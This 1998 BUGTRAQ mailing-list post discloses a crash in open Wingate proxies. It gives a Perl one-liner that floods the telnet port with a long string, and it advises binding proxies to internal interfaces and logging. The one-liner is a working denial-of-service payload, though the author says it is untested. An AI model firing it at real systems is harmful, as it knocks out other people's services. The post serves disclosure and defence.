Date: Sat, 14 Nov 1998 13:51:30 -0500
From: G23 <g23@USA.NET>
To: BUGTRAQ@netspace.org
Subject: crashing wingates

Hello,

The following one-liner will crash an open Wingate.

perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
->send("X" x 4400 . "\n",0)'

Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The above is my rendition
of a 44 line sh script written by "rEWTED" (kefka@infected.org).

Anyone configuring a proxy for LAN use should only bind to an internal
interface anyway.  (IE, kidz shouldn't even see your proxy)
http://wingate.net/helppages/wingate2Securing_your_network.html

If you do provide telnet proxy for the world, then at least log.
http://wingate.net/helppages/wingate2Auditing_and_Logging.html

ghost23